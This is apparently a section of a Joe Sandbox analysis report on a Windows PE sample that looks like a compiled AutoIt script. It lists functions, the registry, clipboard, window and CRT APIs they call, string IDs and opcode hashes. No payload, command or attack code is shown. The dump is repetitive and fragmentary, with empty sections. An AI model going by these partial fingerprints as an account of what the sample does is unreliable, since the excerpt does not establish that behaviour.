                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseConnectCreateRegistry
                                                                                                        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                        • API String ID: 3217815495-966354055
                                                                                                        • Opcode ID: c70c32215588f8ec8bb03fc6aa478a266b625616447da64362da41b73b816162
                                                                                                        • Instruction ID: 14c723365299aea1e32a80c9e2d98689f85295d348ed372ee81e16963ac3f886
                                                                                                        • Opcode Fuzzy Hash: c70c32215588f8ec8bb03fc6aa478a266b625616447da64362da41b73b816162
                                                                                                        • Instruction Fuzzy Hash: BCE18171604200ABD710EF65C885F1BB7E8EF88704F14895EB949DB352D739ED41CBA9
                                                                                                        Function 004565B2 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 291windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetCursorPos.USER32(?), ref: 004566AE
                                                                                                        • GetDesktopWindow.USER32 ref: 004566C3
                                                                                                        • GetWindowRect.USER32(00000000), ref: 004566CA
                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00456722
                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00456735
                                                                                                        • DestroyWindow.USER32(?), ref: 00456746
                                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456794
                                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 004567B2
                                                                                                        • SendMessageW.USER32(?,00000418,00000000,?), ref: 004567C6
                                                                                                        • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567D6
                                                                                                        • SendMessageW.USER32(?,00000421,?,?), ref: 004567F6
                                                                                                        • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 0045680C
                                                                                                        • IsWindowVisible.USER32(?), ref: 0045682C
                                                                                                        • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00456848
                                                                                                        • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 0045685C
                                                                                                        • GetWindowRect.USER32(?,?), ref: 00456873
                                                                                                        • MonitorFromPoint.USER32(?,00000001,00000002), ref: 00456891
                                                                                                        • GetMonitorInfoW.USER32(00000000,?), ref: 004568A9
                                                                                                        • CopyRect.USER32(?,?), ref: 004568BE
                                                                                                        • SendMessageW.USER32(?,00000412,00000000), ref: 00456914
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSendWindow$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                                                                                                        • String ID: ($,$tooltips_class32
                                                                                                        • API String ID: 225202481-3320066284
                                                                                                        • Opcode ID: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                                                                        • Instruction ID: fcdb4dd5bfb9c4cfeeadc9569793f3eee26ed74f2078e1bfb0220ba6a1b85fea
                                                                                                        • Opcode Fuzzy Hash: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                                                                        • Instruction Fuzzy Hash: 4CB17170A00205AFDB54DFA4CD85BAEB7B4BF48304F10895DE919BB282D778A949CB58
                                                                                                        Function 0046DCB4 Relevance: 36.2, APIs: 24, Instructions: 247clipboardCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • OpenClipboard.USER32(?), ref: 0046DCE7
                                                                                                        • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                                                                        • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                                                                        • CloseClipboard.USER32 ref: 0046DD0D
                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                                                                        • CloseClipboard.USER32 ref: 0046DD41
                                                                                                        • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                                                                        • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                                                                        • CloseClipboard.USER32 ref: 0046DD99
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                                                                        • String ID:
                                                                                                        • API String ID: 15083398-0
                                                                                                        • Opcode ID: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                                                                                        • Instruction ID: c6f05cb0c77453757aa6b00544986da50a17ac1627668c5aecb5782462309948
                                                                                                        • Opcode Fuzzy Hash: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                                                                                        • Instruction Fuzzy Hash: CE81B072704201ABD310EF65DD8AB5EB7A8FF94315F00482EF605E72D1EB74E905879A
                                                                                                        Function 00471BC9 Relevance: 35.3, APIs: 18, Strings: 2, Instructions: 313windowtimeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                        • GetWindowRect.USER32(?,?), ref: 00471CF7
                                                                                                        • GetClientRect.USER32(?,?), ref: 00471D05
                                                                                                        • GetSystemMetrics.USER32(00000007), ref: 00471D0D
                                                                                                        • GetSystemMetrics.USER32(00000008), ref: 00471D20
                                                                                                        • GetSystemMetrics.USER32(00000004), ref: 00471D42
                                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471D71
                                                                                                        • GetSystemMetrics.USER32(00000007), ref: 00471D79
                                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471DA3
                                                                                                        • GetSystemMetrics.USER32(00000008), ref: 00471DAB
                                                                                                        • GetSystemMetrics.USER32(00000004), ref: 00471DCF
                                                                                                        • SetRect.USER32(?,00000000,00000000,?,?), ref: 00471DEE
                                                                                                        • AdjustWindowRectEx.USER32(?,?,00000000,00000040), ref: 00471DFF
                                                                                                        • CreateWindowExW.USER32(00000040,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 00471E35
                                                                                                        • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00471E6E
                                                                                                        • GetClientRect.USER32(?,?), ref: 00471E8A
                                                                                                        • GetStockObject.GDI32(00000011), ref: 00471EA6
                                                                                                        • SendMessageW.USER32(?,00000030,00000000), ref: 00471EB2
                                                                                                        • SetTimer.USER32(00000000,00000000,00000028,00462986), ref: 00471ED9
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
                                                                                                        • String ID: @$AutoIt v3 GUI
                                                                                                        • API String ID: 867697134-3359773793
                                                                                                        • Opcode ID: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                                                                                                        • Instruction ID: 8cf5fd9e7b0abf2f472dad9b41bae804ea9cb1b32c1b51d65689880f1cfe2d6c
                                                                                                        • Opcode Fuzzy Hash: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                                                                                                        • Instruction Fuzzy Hash: 7DC17F71A402059FDB14DFA8DD85BAF77B4FB58714F10862EFA09A7290DB78A840CB58
                                                                                                        Function 00433A13 Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 196COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _wcscat$FileInfoVersion$QuerySizeValue__wcsicoll_wcscpy_wcslen_wcsncpy
                                                                                                        • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                        • API String ID: 1503153545-1459072770
                                                                                                        • Opcode ID: 76acf26b61918e0ebafe3e9c460c5efedcc98b6992261bc6c4f6588f91b2aee1
                                                                                                        • Instruction ID: bf9a9138137c8e48d15734b0b0bf1383f69a7efb75f9ce998fc77f2ad016157b
                                                                                                        • Opcode Fuzzy Hash: 76acf26b61918e0ebafe3e9c460c5efedcc98b6992261bc6c4f6588f91b2aee1
                                                                                                        • Instruction Fuzzy Hash: D551F672A402043BD610BB269C43EFFB36C9F49715F10055FFE09A6242EA7DEA5183AD
                                                                                                        Function 00469296 Relevance: 33.4, APIs: 6, Strings: 13, Instructions: 116COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __wcsicoll$__wcsnicmp
                                                                                                        • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:$pQH
                                                                                                        • API String ID: 790654849-32604322
                                                                                                        • Opcode ID: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                                                                                        • Instruction ID: c91e69f26a1c2718e03151092e39642ccf44f92bf630fd0466772f198d10bc2a
                                                                                                        • Opcode Fuzzy Hash: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                                                                                        • Instruction Fuzzy Hash: CA317731A0420966DB10FAA2DD46BAE736C9F15315F20053BBD00BB2D5E7BC6E4587AE
                                                                                                        Function 00455A89 Relevance: 31.9, APIs: 21, Instructions: 395COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 7b3c0986a6774ad4839bdf3b3ab280162fe8917d12771473e04c5712f0602a0a
                                                                                                        • Instruction ID: 62dae473257cc2caee0a49c5626d46440081d624880130feb25903cd50123649
                                                                                                        • Opcode Fuzzy Hash: 7b3c0986a6774ad4839bdf3b3ab280162fe8917d12771473e04c5712f0602a0a
                                                                                                        • Instruction Fuzzy Hash: 84C128727002046BE724CFA8DC46FAFB7A4EF55311F00416AFA05DA2C1EBB99909C795
                                                                                                        Function 00452AC7 Relevance: 31.8, APIs: 21, Instructions: 343COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00442C5A: __time64.LIBCMT ref: 00442C66
                                                                                                        • _fseek.LIBCMT ref: 00452B3B
                                                                                                        • __wsplitpath.LIBCMT ref: 00452B9B
                                                                                                        • _wcscpy.LIBCMT ref: 00452BB0
                                                                                                        • _wcscat.LIBCMT ref: 00452BC5
                                                                                                        • __wsplitpath.LIBCMT ref: 00452BEF
                                                                                                        • _wcscat.LIBCMT ref: 00452C07
                                                                                                        • _wcscat.LIBCMT ref: 00452C1C
                                                                                                        • __fread_nolock.LIBCMT ref: 00452C53
                                                                                                        • __fread_nolock.LIBCMT ref: 00452C64
                                                                                                        • __fread_nolock.LIBCMT ref: 00452C83
                                                                                                        • __fread_nolock.LIBCMT ref: 00452C94
                                                                                                        • __fread_nolock.LIBCMT ref: 00452CB5
                                                                                                        • __fread_nolock.LIBCMT ref: 00452CC6
                                                                                                        • __fread_nolock.LIBCMT ref: 00452CD7
                                                                                                        • __fread_nolock.LIBCMT ref: 00452CE8
                                                                                                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                                                                                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                                                                                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                                                                                          • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                                                                                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                                                                                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                                                                                          • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                                                                                        • __fread_nolock.LIBCMT ref: 00452D78
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
                                                                                                        • String ID:
                                                                                                        • API String ID: 2054058615-0
                                                                                                        • Opcode ID: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                                                                                                        • Instruction ID: 04d0e47ed4a2b248740d2851a73093f1b496c65d3ae4d984919b8c0089c9d159
                                                                                                        • Opcode Fuzzy Hash: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                                                                                                        • Instruction Fuzzy Hash: 6FC14EB2508340ABD720DF65D881EEFB7E8EFC9704F40492FF68987241E6759548CB66
                                                                                                        Function 0044870C Relevance: 31.8, APIs: 17, Strings: 1, Instructions: 311COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004487BD
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window
                                                                                                        • String ID: 0
                                                                                                        • API String ID: 2353593579-4108050209
                                                                                                        • Opcode ID: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                                                                        • Instruction ID: 06508bea8339de1511a48146ac1d08a96458f0089f80555ee302a354f7131a6f
                                                                                                        • Opcode Fuzzy Hash: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                                                                        • Instruction Fuzzy Hash: 35B18BB0204341ABF324CF24CC89BABBBE4FB89744F14491EF591962D1DBB8A845CB59
                                                                                                        Function 0044A032 Relevance: 31.7, APIs: 21, Instructions: 198windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetSysColor.USER32(0000000F), ref: 0044A05E
                                                                                                        • GetClientRect.USER32(?,?), ref: 0044A0D1
                                                                                                        • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A0E9
                                                                                                        • GetWindowDC.USER32(?), ref: 0044A0F6
                                                                                                        • GetPixel.GDI32(00000000,?,?), ref: 0044A108
                                                                                                        • ReleaseDC.USER32(?,?), ref: 0044A11B
                                                                                                        • GetSysColor.USER32(0000000F), ref: 0044A131
                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0044A140
                                                                                                        • GetSysColor.USER32(0000000F), ref: 0044A14F
                                                                                                        • GetSysColor.USER32(00000005), ref: 0044A15B
                                                                                                        • GetWindowDC.USER32(?), ref: 0044A1BE
                                                                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A1CB
                                                                                                        • GetPixel.GDI32(00000000,?,00000000), ref: 0044A1E4
                                                                                                        • GetPixel.GDI32(00000000,00000000,?), ref: 0044A1FD
                                                                                                        • GetPixel.GDI32(00000000,?,?), ref: 0044A21D
                                                                                                        • ReleaseDC.USER32(?,00000000), ref: 0044A229
                                                                                                        • SetBkColor.GDI32(?,00000000), ref: 0044A24C
                                                                                                        • GetSysColor.USER32(00000008), ref: 0044A265
                                                                                                        • SetTextColor.GDI32(?,00000000), ref: 0044A270
                                                                                                        • SetBkMode.GDI32(?,00000001), ref: 0044A282
                                                                                                        • GetStockObject.GDI32(00000005), ref: 0044A28A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                                                                                                        • String ID:
                                                                                                        • API String ID: 1744303182-0
                                                                                                        • Opcode ID: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                                                                        • Instruction ID: 0380b5c53d8a23173c1b90063483f03488caaf4f58ae5d2001aea5c06c56dff4
                                                                                                        • Opcode Fuzzy Hash: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                                                                        • Instruction Fuzzy Hash: E6612531140101ABE7109F78CC88BAB7764FB46320F14876AFD659B3D0DBB49C529BAA
                                                                                                        Function 00417C20 Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 109libraryloadermemoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004164DE), ref: 00417C28
                                                                                                        • __mtterm.LIBCMT ref: 00417C34
                                                                                                          • Part of subcall function 004178FF: TlsFree.KERNEL32(00000017,00417D96,?,004164DE), ref: 0041792A
                                                                                                          • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000000,00000000,00410E44,?,00417D96,?,004164DE), ref: 004181B8
                                                                                                          • Part of subcall function 004178FF: _free.LIBCMT ref: 004181BB
                                                                                                          • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000017,00410E44,?,00417D96,?,004164DE), ref: 004181E2
                                                                                                        • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00417C4A
                                                                                                        • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00417C57
                                                                                                        • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00417C64
                                                                                                        • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00417C71
                                                                                                        • TlsAlloc.KERNEL32(?,004164DE), ref: 00417CC1
                                                                                                        • TlsSetValue.KERNEL32(00000000,?,004164DE), ref: 00417CDC
                                                                                                        • __init_pointers.LIBCMT ref: 00417CE6
                                                                                                        • __calloc_crt.LIBCMT ref: 00417D54
                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00417D80
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                                                        • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                        • API String ID: 4163708885-3819984048
                                                                                                        • Opcode ID: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                                                                        • Instruction ID: ca22d9d2e1075830452d52834408fe47c465c3b6ac2468b12672dd77d4d5938c
                                                                                                        • Opcode Fuzzy Hash: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                                                                        • Instruction Fuzzy Hash: D5315A75808710DECB10AF75BD0865A3EB8BB60764B12093FE914932B0DB7D8881CF9C
